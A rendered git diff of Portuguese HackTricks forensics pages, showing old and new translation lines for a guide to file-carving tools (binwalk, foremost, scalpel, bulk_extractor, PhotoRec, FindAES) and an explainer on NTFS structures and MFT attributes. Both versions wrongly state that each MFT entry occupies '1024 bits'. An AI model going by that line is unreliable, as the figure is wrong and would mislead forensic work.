<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

54
forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
View file

@ -1,14 +1,14 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
@ -17,12 +17,12 @@ Outras formas de apoiar o HackTricks:
## Autopsy
A ferramenta mais comum usada em forense para extrair arquivos de imagens é o [**Autopsy**](https://www.autopsy.com/download/). Baixe-o, instale-o e faça-o processar o arquivo para encontrar arquivos "ocultos". Note que o Autopsy é construído para suportar imagens de disco e outros tipos de imagens, mas não arquivos simples.
A ferramenta mais comum usada em forense para extrair arquivos de imagens é o [**Autopsy**](https://www.autopsy.com/download/). Baixe, instale e faça com que ele ingira o arquivo para encontrar arquivos "ocultos". Note que o Autopsy é construído para suportar imagens de disco e outros tipos de imagens, mas não arquivos simples.
## Binwalk <a id="binwalk"></a>
**Binwalk** é uma ferramenta para procurar arquivos binários como imagens e arquivos de áudio em busca de arquivos e dados embutidos.
Pode ser instalado com `apt`, no entanto, o [código-fonte](https://github.com/ReFirmLabs/binwalk) pode ser encontrado no github.
**Binwalk** é uma ferramenta para buscar arquivos binários como imagens e arquivos de áudio para arquivos e dados incorporados.
Pode ser instalado com `apt`, no entanto a [fonte](https://github.com/ReFirmLabs/binwalk) pode ser encontrada no github.
**Comandos úteis**:
```bash
sudo apt install binwalk #Insllation
@ -32,7 +32,7 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file
```
## Foremost
Outra ferramenta comum para encontrar arquivos ocultos é o **foremost**. Você pode encontrar o arquivo de configuração do foremost em `/etc/foremost.conf`. Se você deseja procurar apenas por alguns arquivos específicos, descomente-os. Se você não descomentar nada, o foremost procurará pelos tipos de arquivos configurados por padrão.
Outra ferramenta comum para encontrar arquivos ocultos é o **foremost**. Você pode encontrar o arquivo de configuração do foremost em `/etc/foremost.conf`. Se você deseja procurar por arquivos específicos, descomente-os. Se você não descomentar nada, o foremost procurará pelos tipos de arquivos configurados por padrão.
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
@ -40,54 +40,54 @@ foremost -v -i file.img -o output
```
## **Scalpel**
**Scalpel** é outra ferramenta que pode ser usada para encontrar e extrair **arquivos embutidos em um arquivo**. Neste caso, você precisará descomentar do arquivo de configuração \(_/etc/scalpel/scalpel.conf_\) os tipos de arquivo que deseja extrair.
**Scalpel** é outra ferramenta que pode ser usada para encontrar e extrair **arquivos incorporados em um arquivo**. Neste caso, você precisará descomentar no arquivo de configuração \(_/etc/scalpel/scalpel.conf_\) os tipos de arquivo que deseja extrair.
```bash
sudo apt-get install scalpel
scalpel file.img -o output
```
## Bulk Extractor
Esta ferramenta está inclusa no Kali, mas você pode encontrá-la aqui: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
Esta ferramenta vem incluída no kali mas você pode encontrá-la aqui: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
Esta ferramenta pode escanear uma imagem e irá **extrair pcaps** dentro dela, **informações de rede \(URLs, domínios, IPs, MACs, e-mails\)** e mais **arquivos**. Você só precisa fazer:
Esta ferramenta pode escanear uma imagem e irá **extrair pcaps** dentro dela, **informações de rede\(URLs, domínios, IPs, MACs, e-mails\)** e mais **arquivos**. Você só precisa fazer:
```text
bulk_extractor memory.img -o out_folder
```
Navegue por **todas as informações** que a ferramenta coletou \(senhas?\), **analise** os **pacotes** \(leia [**Análise de Pcaps**](../pcap-inspection/)\), procure por **domínios estranhos** \(domínios relacionados a **malware** ou **inexistentes**\).
Navegue por **todas as informações** que a ferramenta reuniu \(senhas?\), **analise** os **pacotes** \(leia [**Análise de Pcaps**](../pcap-inspection/)\), procure por **domínios estranhos** \(domínios relacionados a **malware** ou **não existentes**\).
## PhotoRec
Você pode encontrá-lo em [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
Ele vem com versão GUI e CLI. Você pode selecionar os **tipos de arquivo** que deseja que o PhotoRec procure.
Ele vem com versões GUI e CLI. Você pode selecionar os **tipos de arquivos** que deseja que o PhotoRec pesquise.
![](../../../.gitbook/assets/image%20%28524%29.png)
# Ferramentas Específicas para Carving de Dados
# Ferramentas Específicas de Escultura de Dados
## FindAES
Procura por chaves AES buscando seus agendamentos de chave. Capaz de encontrar chaves de 128, 192 e 256 bits, como as usadas por TrueCrypt e BitLocker.
Procura por chaves AES pesquisando por suas tabelas de chaves. Capaz de encontrar chaves de 128, 192 e 256 bits, como as usadas pelo TrueCrypt e BitLocker.
Baixe [aqui](https://sourceforge.net/projects/findaes/).
# Ferramentas Complementares
Você pode usar [**viu**](https://github.com/atanunq/viu) para ver imagens do terminal.
Você pode usar a ferramenta de linha de comando do Linux **pdftotext** para transformar um PDF em texto e lê-lo.
Você pode usar [**viu** ](https://github.com/atanunq/viu)para ver imagens a partir do terminal.
Você pode usar a ferramenta de linha de comando do linux **pdftotext** para transformar um pdf em texto e lê-lo.
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

194
forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md
View file

@ -4,179 +4,181 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
- Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
- Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
- **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
- **Compartilhe suas dicas de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## **NTFS**
**NTFS** (**New Technology File System**) é um sistema de arquivos com journaling proprietário desenvolvido pela Microsoft.
**NTFS** (**New Technology File System**) é um sistema de arquivos de registro proprietário desenvolvido pela Microsoft.
O cluster é a menor unidade de tamanho no NTFS e o tamanho do cluster depende do tamanho de uma partição.
| Tamanho da partição | Setores por cluster | Tamanho do cluster |
| ------------------------ | ------------------- | ------------ |
| 512MB ou menos | 1 | 512 bytes |
| 513MB-1024MB (1GB) | 2 | 1KB |
| 1025MB-2048MB (2GB) | 4 | 2KB |
| 2049MB-4096MB (4GB) | 8 | 4KB |
| 4097MB-8192MB (8GB) | 16 | 8KB |
| 8193MB-16,384MB (16GB) | 32 | 16KB |
| 16,385MB-32,768MB (32GB) | 64 | 32KB |
| Maior que 32,768MB | 128 | 64KB |
| Tamanho da partição | Setores por cluster | Tamanho do cluster |
| ------------------------ | ------------------- | ------------------ |
| 512MB ou menos | 1 | 512 bytes |
| 513MB-1024MB (1GB) | 2 | 1KB |
| 1025MB-2048MB (2GB) | 4 | 2KB |
| 2049MB-4096MB (4GB) | 8 | 4KB |
| 4097MB-8192MB (8GB) | 16 | 8KB |
| 8193MB-16,384MB (16GB) | 32 | 16KB |
| 16,385MB-32,768MB (32GB) | 64 | 32KB |
| Maior que 32,768MB | 128 | 64KB |
### **Espaço Residual**
### **Espaço de Reserva**
Como a **menor** unidade de tamanho do NTFS é um **cluster**. Cada arquivo estará ocupando vários clusters completos. Então, é altamente provável que **cada arquivo ocupe mais espaço do que o necessário**. Esses **espaços não utilizados** **reservados** por um arquivo são chamados de **espaço residual** e as pessoas podem tirar vantagem dessa área para **esconder** **informações**.
Como a menor unidade de tamanho do NTFS é um **cluster**, cada arquivo ocupará vários clusters completos. Assim, é altamente provável que **cada arquivo ocupe mais espaço do que o necessário**. Esses **espaços não utilizados** **reservados** por um arquivo são chamados de **espaço de reserva** e as pessoas podem aproveitar essa área para **ocultar** **informações**.
![](<../../../.gitbook/assets/image (498).png>)
### **Setor de boot do NTFS**
### **Setor de Boot do NTFS**
Quando você formata um volume NTFS, o programa de formatação aloca os primeiros 16 setores para o arquivo de metadados de Boot. O primeiro setor é um setor de boot com um código de "bootstrap" e os 15 setores seguintes são o IPL (Initial Program Loader) do setor de boot. Para aumentar a confiabilidade do sistema de arquivos, o último setor de uma partição NTFS contém uma cópia de reserva do setor de boot.
Ao formatar um volume NTFS, o programa de formatação aloca os primeiros 16 setores para o arquivo de metadados de Boot. O primeiro setor é um setor de boot com um código "bootstrap" e os 15 setores seguintes são o IPL (Initial Program Loader) do setor de boot. Para aumentar a confiabilidade do sistema de arquivos, o último setor de uma partição NTFS contém uma cópia sobressalente do setor de boot.
### **Tabela de Arquivos Mestre (MFT)**
O sistema de arquivos NTFS contém um arquivo chamado Tabela de Arquivos Mestre (MFT). pelo menos **uma entrada na MFT para cada arquivo em um volume do sistema de arquivos NTFS**, incluindo a própria MFT. Todas as informações sobre um arquivo, incluindo seu **tamanho, carimbos de data e hora, permissões e conteúdo de dados**, são armazenadas ou em entradas da MFT ou em espaço fora da MFT que é descrito por entradas da MFT.
O sistema de arquivos NTFS contém um arquivo chamado Tabela de Arquivos Mestre (MFT). Existe pelo menos **uma entrada na MFT para cada arquivo em um volume do sistema de arquivos NTFS**, incluindo a própria MFT. Todas as informações sobre um arquivo, incluindo seu **tamanho, carimbos de data e hora, permissões e conteúdo de dados**, são armazenadas em entradas da MFT ou em espaço fora da MFT descrito por entradas da MFT.
À medida que **arquivos são adicionados** a um volume do sistema de arquivos NTFS, mais entradas são adicionadas à MFT e a **MFT aumenta de tamanho**. Quando **arquivos** são **deletados** de um volume do sistema de arquivos NTFS, suas **entradas na MFT são marcadas como livres** e podem ser reutilizadas. No entanto, o espaço em disco que foi alocado para essas entradas não é realocado, e o tamanho da MFT não diminui.
À medida que **arquivos são adicionados** a um volume do sistema de arquivos NTFS, mais entradas são adicionadas à MFT e a **MFT aumenta de tamanho**. Quando os **arquivos** são **excluídos** de um volume do sistema de arquivos NTFS, suas **entradas da MFT são marcadas como livres** e podem ser reutilizadas. No entanto, o espaço em disco alocado para essas entradas não é realocado, e o tamanho da MFT não diminui.
O sistema de arquivos NTFS **reserva espaço para a MFT para manter a MFT o mais contígua possível** à medida que cresce. O espaço reservado pelo sistema de arquivos NTFS para a MFT em cada volume é chamado de **zona da MFT**. Espaço para arquivos e diretórios também é alocado a partir deste espaço, mas somente depois que todo o espaço do volume fora da zona da MFT tenha sido alocado.
O sistema de arquivos NTFS **reserva espaço para a MFT para mantê-la o mais contígua possível** à medida que cresce. O espaço reservado pelo sistema de arquivos NTFS para a MFT em cada volume é chamado de **zona da MFT**. O espaço para arquivos e diretórios também é alocado a partir deste espaço, mas somente depois que todo o espaço do volume fora da zona da MFT foi alocado.
Dependendo do tamanho médio do arquivo e de outras variáveis, **ou a zona reservada da MFT ou o espaço não reservado no disco podem ser alocados primeiro à medida que o disco se enche até a capacidade**. Volumes com um pequeno número de arquivos relativamente grandes alocarão o espaço não reservado primeiro, enquanto volumes com um grande número de arquivos relativamente pequenos alocarão a zona da MFT primeiro. Em ambos os casos, a fragmentação da MFT começa a ocorrer quando uma região ou outra fica totalmente alocada. Se o espaço não reservado estiver completamente alocado, o espaço para arquivos e diretórios do usuário será alocado a partir da zona da MFT. Se a zona da MFT estiver completamente alocada, o espaço para novas entradas da MFT será alocado a partir do espaço não reservado.
Dependendo do tamanho médio do arquivo e de outras variáveis, **tanto a zona da MFT reservada quanto o espaço não reservado no disco podem ser alocados primeiro** à medida que o disco se enche. Volumes com um pequeno número de arquivos relativamente grandes alocarão primeiro o espaço não reservado, enquanto volumes com um grande número de arquivos relativamente pequenos alocarão primeiro a zona da MFT. Em ambos os casos, a fragmentação da MFT começa a ocorrer quando uma região ou outra se torna totalmente alocada. Se o espaço não reservado estiver completamente alocado, o espaço para arquivos e diretórios do usuário será alocado a partir da zona da MFT. Se a zona da MFT estiver completamente alocada, o espaço para novas entradas da MFT será alocado a partir do espaço não reservado.
Os sistemas de arquivos NTFS também geram um **$MFTMirror**. Esta é uma **cópia** das **primeiras 4 entradas** da MFT: $MFT, $MFT Mirror, $Log, $Volume.
Os sistemas de arquivos NTFS também geram um **$MFTMirror**. Esta é uma **cópia** dos **primeiros 4 registros** da MFT: $MFT, $MFT Mirror, $Log, $Volume.
O NTFS reserva os primeiros 16 registros da tabela para informações especiais:
| Arquivo do Sistema | Nome do Arquivo | Registro MFT | Propósito do Arquivo |
| --------------------- | --------- | ---------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Tabela de arquivos mestre | $Mft | 0 | Contém um registro de arquivo base para cada arquivo e pasta em um volume NTFS. Se as informações de alocação para um arquivo ou pasta forem muito grandes para caber em um único registro, outros registros de arquivos são alocados também. |
| Tabela de arquivos mestre 2 | $MftMirr | 1 | Uma imagem duplicada dos primeiros quatro registros da MFT. Este arquivo garante acesso à MFT em caso de falha de um único setor. |
| Arquivo de log | $LogFile | 2 | Contém uma lista de etapas de transação usadas para recuperabilidade do NTFS. O tamanho do arquivo de log depende do tamanho do volume e pode ser tão grande quanto 4 MB. É usado pelo Windows NT/2000 para restaurar a consistência do NTFS após uma falha do sistema. |
| Volume | $Volume | 3 | Contém informações sobre o volume, como o rótulo do volume e a versão do volume. |
| Definições de atributos | $AttrDef | 4 | Uma tabela de nomes, números e descrições de atributos. |
| Índice de nomes de arquivos raiz | $ | 5 | A pasta raiz. |
| Mapa de bits do cluster | $Bitmap | 6 | Uma representação do volume mostrando quais clusters estão em uso. |
| Setor de boot | $Boot | 7 | Inclui o BPB usado para montar o volume e código adicional do carregador de bootstrap usado se o volume for inicializável. |
| Arquivo de cluster ruim | $BadClus | 8 | Contém clusters ruins para o volume. |
| Arquivo de segurança | $Secure | 9 | Contém descritores de segurança únicos para todos os arquivos dentro de um volume. |
| Tabela de maiúsculas | $Upcase | 10 | Converte caracteres minúsculos para caracteres Unicode maiúsculos correspondentes. |
| Arquivo de extensão do NTFS | $Extend | 11 | Usado para várias extensões opcionais, como cotas, dados de ponto de reanálise e identificadores de objeto. |
| | | 12-15 | Reservado para uso futuro. |
| Arquivo de gerenciamento de cota | $Quota | 24 | Contém limites de cota atribuídos pelo usuário no espaço do volume. |
| Arquivo de ID de objeto | $ObjId | 25 | Contém IDs de objeto de arquivo. |
| Arquivo de ponto de reanálise | $Reparse | 26 | Este arquivo contém informações sobre arquivos e pastas no volume, incluindo dados de ponto de reanálise. |
| Arquivo de Sistema | Nome do Arquivo | Registro MFT | Propósito do Arquivo |
| ---------------------- | --------------- | ------------ | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| Tabela de arquivos mestre | $Mft | 0 | Contém um registro de arquivo base para cada arquivo e pasta em um volume NTFS. Se as informações de alocação para um arquivo ou pasta forem muito grandes para caber em um único registro, outros registros de arquivo também são alocados. |
| Tabela de arquivos mestre 2 | $MftMirr | 1 | Uma imagem duplicada dos primeiros quatro registros da MFT. Este arquivo garante acesso à MFT em caso de falha de um setor. |
| Arquivo de log | $LogFile | 2 | Contém uma lista de etapas de transação usadas para recuperabilidade do NTFS. O tamanho do arquivo de log depende do tamanho do volume e pode ser tão grande quanto 4 MB. É usado pelo Windows NT/2000 para restaurar a consistência do NTFS após uma falha do sistema. |
| Volume | $Volume | 3 | Contém informações sobre o volume, como o rótulo do volume e a versão do volume. |
| Definições de atributo | $AttrDef | 4 | Uma tabela de nomes de atributos, números e descrições. |
| Índice do nome do arquivo raiz | $ | 5 | A pasta raiz. |
| Bitmap de cluster | $Bitmap | 6 | Uma representação do volume mostrando quais clusters estão em uso. |
| Setor de boot | $Boot | 7 | Inclui o BPB usado para montar o volume e código de carregador de inicialização adicional usado se o volume for inicializável. |
| Arquivo de cluster ruim | $BadClus | 8 | Contém clusters ruins para o volume. |
| Arquivo de segurança | $Secure | 9 | Contém descritores de segurança exclusivos para todos os arquivos dentro de um volume. |
| Tabela de conversão de maiúsculas | $Upcase | 10 | Converte caracteres minúsculos em caracteres maiúsculos Unicode correspondentes. |
| Arquivo de extensão NTFS | $Extend | 11 | Usado para várias extensões opcionais, como cotas, dados de ponto de reanálise e identificadores de objeto. |
| | | 12-15 | Reservado para uso futuro. |
| Arquivo de gerenciamento de cotas | $Quota | 24 | Contém limites de cota atribuídos pelo usuário no espaço do volume. |
| Arquivo de ID de objeto | $ObjId | 25 | Contém IDs de objeto de arquivo. |
| Arquivo de ponto de reanálise | $Reparse | 26 | Este arquivo contém informações sobre arquivos e pastas no volume, incluindo dados de ponto de reanálise. |
### Cada entrada da MFT parece com o seguinte:
### Cada entrada da MFT se parece com o seguinte:
![](<../../../.gitbook/assets/image (499).png>)
Note como cada entrada começa com "FILE". Cada entrada ocupa 1024 bits. Então, após 1024 bits do início de uma entrada da MFT, você encontrará a próxima.
Observe como cada entrada começa com "FILE". Cada entrada ocupa 1024 bits. Portanto, após 1024 bits do início de uma entrada da MFT, você encontrará a próxima.
Usando o [**Active Disk Editor**](https://www.disk-editor.org/index.html) é muito fácil inspecionar a entrada de um arquivo na MFT. Basta clicar com o botão direito no arquivo e depois clicar em "Inspect File Record"
Usando o [**Active Disk Editor**](https://www.disk-editor.org/index.html), é muito fácil inspecionar a entrada de um arquivo na MFT. Basta clicar com o botão direito no arquivo e depois clicar em "Inspect File Record"
![](<../../../.gitbook/assets/image (500).png>)
![](<../../../.gitbook/assets/image (501).png>)
Verificando a flag **"In use"** é muito fácil saber se um arquivo foi deletado (um valor de **0x0 significa deletado**).
Verificando a flag **"In use"** é muito fácil saber se um arquivo foi excluído (um valor de **0x0 significa excluído**).
![](<../../../.gitbook/assets/image (510).png>)
Também é possível recuperar arquivos deletados usando o FTKImager:
Também é possível recuperar arquivos excluídos usando o FTKImager:
![](<../../../.gitbook/assets/image (502).png>)
### Atributos da MFT
Cada entrada da MFT tem vários atributos como a seguinte imagem indica:
Cada entrada da MFT possui vários atributos, conforme a seguinte imagem indica:
![](<../../../.gitbook/assets/image (506).png>)
Cada atributo indica alguma informação da entrada identificada pelo tipo:
Cada atributo indica algumas informações da entrada identificadas pelo tipo:
| Identificador do Tipo | Nome | Descrição |
| --------------- | ------------------------ | ----------------------------------------------------------------------------------------------------------------- |
| 16 | $STANDARD\_INFORMATION | Informações gerais, como flags; os últimos tempos acessados, escritos e criados; e o ID do proprietário e de segurança. |
| 32 | $ATTRIBUTE\_LIST | Lista onde outros atributos para um arquivo podem ser encontrados. |
| 48 | $FILE\_NAME | Nome do arquivo, em Unicode, e os últimos tempos acessados, escritos e criados. |
| 64 | $VOLUME\_VERSION | Informações do volume. Existe apenas na versão 1.2 (Windows NT). |
| 64 | $OBJECT\_ID | Um identificador único de 16 bytes para o arquivo ou diretório. Existe apenas nas versões 3.0+ e posteriores (Windows 2000+). |
| 80 | $SECURITY\_ DESCRIPTOR | As propriedades de controle de acesso e segurança do arquivo. |
| 96 | $VOLUME\_NAME | Nome do volume. |
| 112 | $VOLUME\_ INFORMATION | Versão do sistema de arquivos e outras flags. |
| 128 | $DATA | Conteúdo do arquivo. |
| 144 | $INDEX\_ROOT | Nó raiz de uma árvore de índice. |
| 160 | $INDEX\_ALLOCATION | Nós de uma árvore de índice enraizada no atributo $INDEX\_ROOT. |
| 176 | $BITMAP | Um bitmap para o arquivo $MFT e para índices. |
| 192 | $SYMBOLIC\_LINK | Informações de link simbólico. Existe apenas na versão 1.2 (Windows NT). |
| 192 | $REPARSE\_POINT | Contém dados sobre um ponto de reanálise, que é usado como um link simbólico na versão 3.0+ (Windows 2000+). |
| 208 | $EA\_INFORMATION | Usado para compatibilidade com aplicações do OS/2 (HPFS). |
| 224 | $EA | Usado para compatibilidade com aplicações do OS/2 (HPFS). |
| 256 | $LOGGED\_UTILITY\_STREAM | Contém chaves e informações sobre atributos criptografados na versão 3.0+ (Windows 2000+). |
| Identificador de Tipo | Nome | Descrição |
| ---------------------- | ------------------------ | ----------------------------------------------------------------------------------------------------------------- |
| 16 | $STANDARD\_INFORMATION | Informações gerais, como flags; as últimas vezes de acesso, escrita e criação; e o proprietário e ID de segurança. |
| 32 | $ATTRIBUTE\_LIST | Lista onde outros atributos de um arquivo podem ser encontrados. |
| 48 | $FILE\_NAME | Nome do arquivo, em Unicode, e as últimas vezes de acesso, escrita e criação. |
| 64 | $VOLUME\_VERSION | Informações do volume. Existe apenas na versão 1.2 (Windows NT). |
| 64 | $OBJECT\_ID | Um identificador único de 16 bytes para o arquivo ou diretório. Existe apenas nas versões 3.0+ e posteriores (Windows 2000+). |
| 80 | $SECURITY\_ DESCRIPTOR | As propriedades de controle de acesso e segurança do arquivo. |
| 96 | $VOLUME\_NAME | Nome do volume. |
| 112 | $VOLUME\_ INFORMATION | Versão do sistema de arquivos e outras flags. |
| 128 | $DATA | Conteúdo do arquivo. |
| 144 | $INDEX\_ROOT | Nó raiz de uma árvore de índice. |
| 160 | $INDEX\_ALLOCATION | Nós de uma árvore de índice enraizada no atributo $INDEX\_ROOT. |
| 176 | $BITMAP | Um mapa de bits para o arquivo $MFT e para índices. |
| 192 | $SYMBOLIC\_LINK | Informações de link simbólico. Existe apenas na versão 1.2 (Windows NT). |
| 192 | $REPARSE\_POINT | Contém dados sobre um ponto de reanálise, que é usado como um link simbólico na versão 3.0+ (Windows 2000+). |
| 208 | $EA\_INFORMATION | Usado para compatibilidade com aplicativos OS/2 (HPFS). |
| 224 | $EA | Usado para compatibilidade com aplicativos OS/2 (HPFS). |
| 256 | $LOGGED\_UTILITY\_STREAM | Contém chaves e informações sobre atributos criptografados na versão 3.0+ (Windows 2000+). |
Por exemplo, o **tipo 48 (0x30)** identifica o **nome do arquivo**:
![](<../../../.gitbook/assets/image (508).png>)
Também é útil entender que **esses atributos podem ser residentes** (ou seja, existem dentro de um determinado registro da MFT) ou **não residentes** (ou seja, existem fora de um determinado registro da MFT, em outro lugar no disco, e são simplesmente referenciados dentro do registro). Por exemplo, se o atributo **$Data for residente**, isso significa que o **arquivo inteiro está salvo na MFT**, se for não residente, então o conteúdo do arquivo está em outra parte do sistema de arquivos.
